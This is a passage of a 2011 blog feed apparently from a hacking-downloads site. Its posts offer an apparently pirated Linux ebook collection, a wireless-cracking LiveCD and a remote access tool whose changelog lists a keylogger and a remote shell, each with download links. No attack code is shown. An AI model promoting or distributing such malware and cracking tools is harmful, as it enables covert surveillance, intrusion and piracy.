&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC1wOcF1-DiEZA_DbkqszJpjln8RVvAKLc2y00DdjeTT_KbNZDEYBMrvc_6i-48u6gOIAPtCmDUpuusC05mlOC3lXgPlRasf07LYtnS4TCzIYoyIcwXGu4VUDqckpvfK1hHOFMvPmcpUw/s1600/Linux_Complete_Ebooks_Collection.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot; xpndit=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;277&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC1wOcF1-DiEZA_DbkqszJpjln8RVvAKLc2y00DdjeTT_KbNZDEYBMrvc_6i-48u6gOIAPtCmDUpuusC05mlOC3lXgPlRasf07LYtnS4TCzIYoyIcwXGu4VUDqckpvfK1hHOFMvPmcpUw/s320/Linux_Complete_Ebooks_Collection.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;div align=&quot;center&quot;&gt;
&lt;b&gt;Linux Complete Ebooks Collection &lt;/b&gt;&lt;br /&gt;Language: English | PDF &amp;amp; CHM | Collection book | 624 MB&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;b&gt;CONTENTS:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1. Essentials Books&lt;br /&gt;&lt;br /&gt;How Linux Works - What Every Super-User Should Know.chm&lt;br /&gt;Linux Bible 2008 Edition.pdf&lt;br /&gt;Linux Newbie Administrator Guide.pdf&lt;br /&gt;Linux The Complete Reference.pdf&lt;br /&gt;Linux Annoyances For Geeks.chm&lt;br /&gt;Backup And Recovery.pdf&lt;br /&gt;....&lt;br /&gt;&lt;br /&gt;Dns in Action A Detailed and Practical Guide to Dns.pdf&lt;br /&gt;Ebook Teach Yourself Linux In 24 Hours Sharereactor.pdf&lt;br /&gt;Hacking Linux Exposed.pdf&lt;br /&gt;Linux Timesaving Techniques for Dummies.pdf&lt;br /&gt;Linux Troubleshooting For System Administrators And Power Users .chm&lt;br /&gt;Linux+ Certification_Bible.pdf&lt;br /&gt;O&#39;Reilly - Essential System Administration 3rd Edition.chm&lt;br /&gt;O&#39;Reilly - Learning Red Hat Enterprise Linux &amp;amp; Fedora 4th Edition.chm&lt;br /&gt;O&#39;Reilly - Learning the bash Shell 2nd Edition.chm&lt;br /&gt;O&#39;Reilly - Learning the Vi Editor 6th Edition.pdf&lt;br /&gt;O&#39;Reilly - Linux Cookbook.chm&lt;br /&gt;O&#39;Reilly - Linux in a Nutshell 4th Edition.chm&lt;br /&gt;O&#39;Reilly - Linux Server Hacks.pdf&lt;br /&gt;O&#39;Reilly - Practical Unix &amp;amp; Internet Security 3rd Edition.chm&lt;br /&gt;O&#39;Reilly - Running Linux 4th Edition.pdf&lt;br /&gt;O&#39;Reilly - UNIX in a Nutshell 3rd Edition.chm&lt;br /&gt;O&#39;Reilly - UNIX Power Tools 3rd Edition.chm&lt;br /&gt;OReilly Linux System Administration.pdf&lt;br /&gt;Red Hat Linux Security And Optimization.pdf&lt;br /&gt;User Mode Linux.chm&lt;br /&gt;&lt;br /&gt;2. Cluster&lt;br /&gt;&lt;br /&gt;Linux Enterprise Cluster.chm&lt;br /&gt;OReilly High Performance Linux Clusters With Oscar Rocks openmosix And Mpi.chm&lt;br /&gt;The MIT Press Beowulf Cluster Computing With Linux Second Edition.chm&lt;br /&gt;&lt;br /&gt;3. Core Linux Concepts (Kernel,Networking,FineTuning,Device Drivers,Thin Client)&lt;br /&gt;&lt;br /&gt;Linux Thin Client Networks Design and Deployment.pdf&lt;br /&gt;O&#39;Reilly - Linux Device Drivers 2nd Edition.pdf&lt;br /&gt;O&#39;Reilly - Understanding the Linux Kernel 2nd Edition.chm&lt;br /&gt;O&#39;Reilly - Understanding The Linux Kernel.pdf&lt;br /&gt;OReilly Linux Unwired.chm&lt;br /&gt;OReilly Zero Configuration Networking The Definitive Guide.chm&lt;br /&gt;Understanding Linux Network Internals.chm&lt;br /&gt;&lt;br /&gt;4. DNS&lt;br /&gt;&lt;br /&gt;Bind9 Administration Reference Manual.pdf&lt;br /&gt;DNS &amp;amp; BIND Cookbook.chm&lt;br /&gt;DNS and BIND, 5th ed.chm&lt;br /&gt;Dns in Action A Detailed and Practical Guide to Dns.pdf&lt;br /&gt;Pro DNS and BIND.pdf&lt;br /&gt;&lt;br /&gt;5. Essentials Networking (VPN,SNMP,Load Balancing)&lt;br /&gt;&lt;br /&gt;Linux The Complete Reference.pdf&lt;br /&gt;O&#39;Reilly - Essential SNMP.chm&lt;br /&gt;O&#39;Reilly - Essential SNMP.pdf&lt;br /&gt;O&#39;Reilly - Ethernet Definitive Guide.pdf&lt;br /&gt;O&#39;Reilly - Linux Network Administrator&#39;s Guide 2nd Edition.pdf&lt;br /&gt;O&#39;Reilly - Server Load Balancing.pdf&lt;br /&gt;O&#39;Reilly - The Network Administration Guide.chm&lt;br /&gt;O&#39;Reilly - Virtual Private Networks 2nd Edition.pdf&lt;br /&gt;OpenVPN - Building And Integrating Virtual Private Networks.pdf&lt;br /&gt;&lt;br /&gt;6. IDS Firewall &amp;amp; Security&lt;br /&gt;&lt;br /&gt;Configuring IPCop Firewalls - Closing Borders With Open Source.pdf&lt;br /&gt;Hacking Linux Exposed.pdf&lt;br /&gt;O&#39;Reilly Building Internet Firewalls 2nd Edition.pdf&lt;br /&gt;O&#39;Reilly - Building Secure Servers with Linux.chm&lt;br /&gt;O&#39;Reilly - Building Secure Servers with Linux.pdf&lt;br /&gt;O&#39;Reilly - Kerberos The Definitive Guide.chm&lt;br /&gt;O&#39;Reilly - Linux Security Cookbook.chm&lt;br /&gt;O&#39;Reilly - Linux Server Hacks.pdf&lt;br /&gt;O&#39;Reilly - Network Security with OpenSSL.pdf&lt;br /&gt;O&#39;Reilly - Practical Unix &amp;amp; Internet Security 3rd Edition.chm&lt;br /&gt;O&#39;Reilly - RADIUS.chm&lt;br /&gt;SANS Institute Securing Linux A Survival Guide for Linux Security.chm&lt;br /&gt;Security Warrior.chm&lt;br /&gt;Snort For Dummies.pdf&lt;br /&gt;The Best Damn Firewall Book Period .pdf&lt;br /&gt;The Tao Of Network Security Monitoring - Beyond Intrusion Detection.chm&lt;br /&gt;&lt;br /&gt;7. LDAP&lt;br /&gt;&lt;br /&gt;O&#39;Reilly - LDAP System Administration.chm&lt;br /&gt;8.Mail Servers&lt;br /&gt;O&#39;Reilly - Postfix The Definitive Guide.chm&lt;br /&gt;O&#39;Reilly - Postfix The Definitive Guide.pdf&lt;br /&gt;O&#39;Reilly - qmail.chm&lt;br /&gt;O&#39;Reilly sendmail 4th Edition.pdf&lt;br /&gt;&lt;br /&gt;8.NFS &amp;amp; NIS&lt;br /&gt;&lt;br /&gt;O&#39;Reilly - Managing NFS and NIS 2nd Edt.pdf&lt;br /&gt;&lt;br /&gt;9.Samba&lt;br /&gt;&lt;br /&gt;O&#39;Reilly Samba 2nd Edition.chm&lt;br /&gt;&lt;br /&gt;10.SELinux&lt;br /&gt;&lt;br /&gt;SELinux By Example - Using Security Enhanced Linux .chm&lt;br /&gt;SELinux NSAs Open Source Security Enhanced Linux .chm&lt;br /&gt;&lt;br /&gt;11. Squid&lt;br /&gt;&lt;br /&gt;O&#39;Reilly - Squid The Definitive Guide.chm&lt;br /&gt;O&#39;Reilly - Squid The Definitive Guide.pdf&lt;br /&gt;&lt;br /&gt;12. SSH &amp;amp; VPN&lt;br /&gt;&lt;br /&gt;IPsec Virtual Private Network Fundamentals.chm&lt;br /&gt;O&#39;Reilly - SSH The Secure Shell The Definitive Guide.pdf&lt;br /&gt;O&#39;Reilly - The Secure Shell The Definitive Guide.pdf&lt;br /&gt;O&#39;Reilly - Virtual Private Networks 2nd Edition.pdf&lt;br /&gt;&lt;br /&gt;13. Web Server - Apache&lt;br /&gt;&lt;br /&gt;Apache Server 2 Bible.pdf&lt;br /&gt;O&#39;Reilly Apache Cookbook.chm&lt;br /&gt;O&#39;Reilly Apache The Definitive Guide 3rd Edition.chm&lt;br /&gt;O&#39;Reilly - Apache The Definitive Guide 3rd Edition.pdf&lt;br /&gt;O&#39;reilly - The Apache Definitive Guide 2nd Edition.pdf&lt;br /&gt;Run Your Own Web Server Using Linux and Apache.chm&lt;br /&gt;&lt;br /&gt;14. BSD&lt;br /&gt;&lt;br /&gt;Backup And Recovery.pdf&lt;br /&gt;O&#39;Reilly - BSD Hacks.pdf&lt;br /&gt;O&#39;Reilly - Learning the UNIX Operating System.pdf&lt;br /&gt;O&#39;Reilly - The Complete FreeBSD.pdf&lt;br /&gt;UNIX Administration A Comprehensive Sourcebook for Effective Systems and Network Management.pdf&lt;br /&gt;Evolution, Design, &amp;amp; Implementation.pdf&lt;br /&gt;I am always adding new things, so check this account often&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;[Filesonic]&lt;/b&gt; ( Recommendation Premium , Highest Speed )&lt;br /&gt;
&lt;div class=&quot;scriptcode&quot;&gt;
http://www.filesonic.com/file/4126959454/Linux.Complete.Ebooks.Collection.part1.rar&lt;br /&gt;http://www.filesonic.com/file/4126962624/Linux.Complete.Ebooks.Collection.part2.rar&lt;br /&gt;http://www.filesonic.com/file/4126963654/Linux.Complete.Ebooks.Collection.part3.rar&lt;br /&gt;http://www.filesonic.com/file/4126963764/Linux.Complete.Ebooks.Collection.part4.rar&lt;br /&gt;http://www.filesonic.com/file/4126963794/Linux.Complete.Ebooks.Collection.part5.rar&lt;br /&gt;http://www.filesonic.com/file/4126963874/Linux.Complete.Ebooks.Collection.part6.rar&lt;br /&gt;http://www.filesonic.com/file/4126964604/Linux.Complete.Ebooks.Collection.part7.rar&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;[FilePost]&lt;/b&gt; ( Recommendation  For Download Free User )&lt;br /&gt;&lt;div class=&quot;scriptcode&quot;&gt;
http://filepost.com/files/c8e8e7c5/Linux.Complete.Ebooks.Collection.part1.rar&lt;br /&gt;http://filepost.com/files/1146e8cd/Linux.Complete.Ebooks.Collection.part2.rar&lt;br /&gt;http://filepost.com/files/124e4f29/Linux.Complete.Ebooks.Collection.part3.rar&lt;br /&gt;http://filepost.com/files/me5bbb68/Linux.Complete.Ebooks.Collection.part4.rar&lt;br /&gt;http://filepost.com/files/bmd81a8d/Linux.Complete.Ebooks.Collection.part5.rar&lt;br /&gt;http://filepost.com/files/7b9m1em5/Linux.Complete.Ebooks.Collection.part6.rar&lt;br /&gt;http://filepost.com/files/ab41af8e/Linux.Complete.Ebooks.Collection.part7.rar&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;[FileJungle]&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;scriptcode&quot;&gt;
http://www.filejungle.com/f/h8Kqmf/Linux.Complete.Ebooks.Collection.part1.rar&lt;br /&gt;http://www.filejungle.com/f/uPtSYh/Linux.Complete.Ebooks.Collection.part2.rar&lt;br /&gt;http://www.filejungle.com/f/D3X8UG/Linux.Complete.Ebooks.Collection.part3.rar&lt;br /&gt;http://www.filejungle.com/f/BFhRKR/Linux.Complete.Ebooks.Collection.part4.rar&lt;br /&gt;http://www.filejungle.com/f/nmR6mN/Linux.Complete.Ebooks.Collection.part5.rar&lt;br /&gt;http://www.filejungle.com/f/GU4NvD/Linux.Complete.Ebooks.Collection.part6.rar&lt;br /&gt;http://www.filejungle.com/f/vHmjyU/Linux.Complete.Ebooks.Collection.part7.rar&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;[FileServe]&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;scriptcode&quot;&gt;
http://www.fileserve.com/file/QNej4rN/Linux.Complete.Ebooks.Collection.part1.rar&lt;br /&gt;http://www.fileserve.com/file/pn2D3NA/Linux.Complete.Ebooks.Collection.part2.rar&lt;br /&gt;http://www.fileserve.com/file/eVNsfAw/Linux.Complete.Ebooks.Collection.part3.rar&lt;br /&gt;http://www.fileserve.com/file/37pYmtW/Linux.Complete.Ebooks.Collection.part4.rar&lt;br /&gt;http://www.fileserve.com/file/jPAZTJG/Linux.Complete.Ebooks.Collection.part5.rar&lt;br /&gt;http://www.fileserve.com/file/yVv6MPK/Linux.Complete.Ebooks.Collection.part6.rar&lt;br /&gt;http://www.fileserve.com/file/Mbm7ZCa/Linux.Complete.Ebooks.Collection.part7.rar&lt;/div&gt;
&lt;div class=&quot;scriptcode&quot;&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;scriptcode&quot;&gt;
Credit:Nulled.org &lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/8514883301902994563/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/linux-complete-ebooks-collection.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/8514883301902994563'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/8514883301902994563'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/linux-complete-ebooks-collection.html' title='Linux Complete Ebooks Collection'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC1wOcF1-DiEZA_DbkqszJpjln8RVvAKLc2y00DdjeTT_KbNZDEYBMrvc_6i-48u6gOIAPtCmDUpuusC05mlOC3lXgPlRasf07LYtnS4TCzIYoyIcwXGu4VUDqckpvfK1hHOFMvPmcpUw/s72-c/Linux_Complete_Ebooks_Collection.jpg" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-1614391096559930414</id><published>2011-12-20T06:36:00.000-08:00</published><updated>2011-12-20T06:36:56.776-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi WPA WEP Wireless Hacking"/><title type='text'>Wireless Hacking LiveCD FBI (Jun 2011)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBzwgu3jXVEUpc9achWBE4i_7RA_n3RoAatlMpO8Cz5Zu8VJvvnv-lgjoEn5lkkGxW5_u-usfA3baKufUpmcuKgD2v68YeQ2r1w9lSq5zmu3FbSpY_PsBzaiBuEYHv5QI53eltMYbhSw/s1600/8445x287.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot; xpndit=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;257&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBzwgu3jXVEUpc9achWBE4i_7RA_n3RoAatlMpO8Cz5Zu8VJvvnv-lgjoEn5lkkGxW5_u-usfA3baKufUpmcuKgD2v68YeQ2r1w9lSq5zmu3FbSpY_PsBzaiBuEYHv5QI53eltMYbhSw/s400/8445x287.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;Wireless Hacking LiveCD FBI (Jun 2011) | 625MB &lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;An
 edited and slightly updated version of the popular LiveCD for working 
with wireless networks. Based on Ubuntu, provides a graphical 
interfeys.Disk boot, there is a script to be installed on the PC hard 
drive or a virtual machine (VirtualPC is not supported).&lt;br /&gt;Integrated over 50 tools to work with the network, scanners, sniffers, password crackers, and so on.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download&lt;/b&gt;:&lt;br /&gt;
&lt;br /&gt;&lt;a href=&quot;http://nulled.org/go/?a%3AaHR0cDovL3d3dy5maWxlc29uaWMuY29tL2ZpbGUvNDIwNjQ2OTIzNS9XaXJlbGVzcy5IYWNrLkZCSS4yMDExLnBhcnQxLnJhcg%3D%3D&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://www.filesonic.com/file/4206469235/Wireless.Hack.FBI.2011.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://nulled.org/go/?a%3AaHR0cDovL3d3dy5maWxlc29uaWMuY29tL2ZpbGUvNDIwNjQ3MDA0NS9XaXJlbGVzcy5IYWNrLkZCSS4yMDExLnBhcnQyLnJhcg%3D%3D&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://www.filesonic.com/file/4206470045/Wireless.Hack.FBI.2011.part2.rar&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://nulled.org/go/?a%3AaHR0cDovL3d3dy5maWxlc29uaWMuY29tL2ZpbGUvNDIwNjQ3MDExNS9XaXJlbGVzcy5IYWNrLkZCSS4yMDExLnBhcnQzLnJhcg%3D%3D&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://www.filesonic.com/file/4206470115/Wireless.Hack.FBI.2011.part3.rar&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://nulled.org/go/?a%3AaHR0cDovL3d3dy5maWxlc29uaWMuY29tL2ZpbGUvNDIwNjUxODYzNS9XaXJlbGVzcy5IYWNrLkZCSS4yMDExLnBhcnQ0LnJhcg%3D%3D&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://www.filesonic.com/file/4206518635/Wireless.Hack.FBI.2011.part4.rar&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Or:&lt;/b&gt;&lt;br /&gt;&lt;a href=&quot;http://nulled.org/go/?a%3AaHR0cDovL3VsLnRvL2ZxZG1tenJ3L1dpcmVsZXNzLkhhY2suRkJJLjIwMTEucGFydDEucmFy&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://ul.to/fqdmmzrw/Wireless.Hack.FBI.2011.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://nulled.org/go/?a%3AaHR0cDovL3VsLnRvL2gxOXd3bjA3L1dpcmVsZXNzLkhhY2suRkJJLjIwMTEucGFydDIucmFy&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://ul.to/h19wwn07/Wireless.Hack.FBI.2011.part2.rar&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://nulled.org/go/?a%3AaHR0cDovL3VsLnRvL3FqYXFpOWQ1L1dpcmVsZXNzLkhhY2suRkJJLjIwMTEucGFydDMucmFy&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://ul.to/qjaqi9d5/Wireless.Hack.FBI.2011.part3.rar&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://nulled.org/go/?a%3AaHR0cDovL3VsLnRvL251Z24yeHc0L1dpcmVsZXNzLkhhY2suRkJJLjIwMTEucGFydDQucmFy&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://ul.to/nugn2xw4/Wireless.Hack.FBI.2011.part4.rar&lt;/a&gt;&lt;br /&gt;&amp;nbsp;
    &lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/1614391096559930414/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/wireless-hacking-livecd-fbi-jun-2011.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/1614391096559930414'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/1614391096559930414'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/wireless-hacking-livecd-fbi-jun-2011.html' title='Wireless Hacking LiveCD FBI (Jun 2011)'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBzwgu3jXVEUpc9achWBE4i_7RA_n3RoAatlMpO8Cz5Zu8VJvvnv-lgjoEn5lkkGxW5_u-usfA3baKufUpmcuKgD2v68YeQ2r1w9lSq5zmu3FbSpY_PsBzaiBuEYHv5QI53eltMYbhSw/s72-c/8445x287.jpg" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-8390088912672403108</id><published>2011-12-20T00:15:00.000-08:00</published><updated>2011-12-20T00:15:42.656-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="Remote Adminstration Tool"/><title type='text'>[RAT]Syla R.A.T. 0.8 Beta Free</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h2 class=&quot;title icon&quot;&gt;


     Syla R.A.T. 0.8 Beta
    &lt;/h2&gt;
&lt;div id=&quot;post_message_141468&quot;&gt;
&lt;blockquote class=&quot;postcontent restore &quot;&gt;
Hi Guys,&lt;br /&gt;
&lt;br /&gt;
Syla R.A.T. 0.8 Beta is out and has a few improvements.&lt;br /&gt;
It&#39;s not a big update but I got it even more stable this time.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;ScreenShots:&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;384&quot; src=&quot;http://img10.imageshack.us/img10/3803/capture0031608201108592.jpg&quot; width=&quot;640&quot; /&gt;&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;384&quot; src=&quot;http://img94.imageshack.us/img94/834/capture0071608201109021.jpg&quot; width=&quot;640&quot; /&gt;&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;384&quot; src=&quot;http://img98.imageshack.us/img98/2414/capture0041608201109012.jpg&quot; width=&quot;640&quot; /&gt;&lt;br /&gt;
&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;384&quot; src=&quot;http://img191.imageshack.us/img191/6171/capture0021408201103335.jpg&quot; width=&quot;640&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;ChangeLog:&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;bbcode_container&quot;&gt;
&lt;div class=&quot;bbcode_description&quot;&gt;
Code:&lt;/div&gt;
&lt;pre class=&quot;bbcode_code&quot; style=&quot;height: 372px;&quot;&gt;Syla R.A.T. 0.8 Beta
==========================================

ServerSize:
------------------

- 144 KB (59.5 KB UPX)

BugFixes:
------------------

- fixed disconnection bug.

- fixed LiveKeylogger crash bug.

- fixed a bug that caused an empty clipboard after it got received.

- fixed a ServerBuilder bug.

- fixed a freeze bug on the server.

- fixed restart Server.


NEW in 0.8 Beta:
------------------

- added Skin.

- added UNICODE RemoteShell.

- added ServiceManager (Beta - not quite finished yet).

- added PING/PONG System.

- added Several PING settings and options.

- added ISADMIN Icon in the SinList.

- Client ListView is now more stable and smoother.

- ProcessManager loads faster now.

- WindowManager loads faster now.


&lt;a href=&quot;http://adf.ly/4JLCU&quot; xpndit=&quot;true&quot;&gt;&lt;b&gt;Download:&lt;/b&gt;&lt;/a&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/8390088912672403108/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/ratsyla-rat-08-beta-free.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/8390088912672403108'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/8390088912672403108'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/ratsyla-rat-08-beta-free.html' title='[RAT]Syla R.A.T. 0.8 Beta Free'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-7988518429956331032</id><published>2011-12-17T21:56:00.000-08:00</published><updated>2011-12-17T22:02:54.219-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Misc"/><title type='text'>Type &quot;let it snow&quot; on Google For a Surprise!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Google has another tricky search result today: Search the words “let it snow” and watch what happens.&lt;br /&gt;
&lt;br /&gt;
Watch your browser fill up with snow, and then skate around with your 
mouse, where your browser acts just like a frozen lake, showing the path
 your cursor has taken. Want to start over? Simply click the “defrost” 
button and again you’ll see a clear screen, adorned by that easy wind 
and downy flake filling it up anew.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbOXwZHQTK-T4RgV7JXYfdOpg3IMJIR4phEgAtymT8dzqMP1Qoq3dgGgOtINb6aF_PBTe-daRs-EMbITALI3pLma1YIL7jjgUQvRAn1OAulxNnVFEEdZ-6ee5UVvw-fxYVrdYpyibCOw8/s1600/let+it+snow.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot; xpndit=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;333&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbOXwZHQTK-T4RgV7JXYfdOpg3IMJIR4phEgAtymT8dzqMP1Qoq3dgGgOtINb6aF_PBTe-daRs-EMbITALI3pLma1YIL7jjgUQvRAn1OAulxNnVFEEdZ-6ee5UVvw-fxYVrdYpyibCOw8/s640/let+it+snow.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Screenshot of &quot;let it snow&quot; effects&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/7988518429956331032/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/type-let-it-snow-on-google-for-surprise.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/7988518429956331032'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/7988518429956331032'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/type-let-it-snow-on-google-for-surprise.html' title='Type &quot;let it snow&quot; on Google For a Surprise!'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbOXwZHQTK-T4RgV7JXYfdOpg3IMJIR4phEgAtymT8dzqMP1Qoq3dgGgOtINb6aF_PBTe-daRs-EMbITALI3pLma1YIL7jjgUQvRAn1OAulxNnVFEEdZ-6ee5UVvw-fxYVrdYpyibCOw8/s72-c/let+it+snow.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-5551704575327479676</id><published>2011-12-17T21:36:00.000-08:00</published><updated>2011-12-17T21:36:51.387-08:00</updated><title type='text'>Announcement!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
All the download links are updated! enjoy downloading&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/5551704575327479676/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/announcement.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/5551704575327479676'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/5551704575327479676'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/announcement.html' title='Announcement!'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image 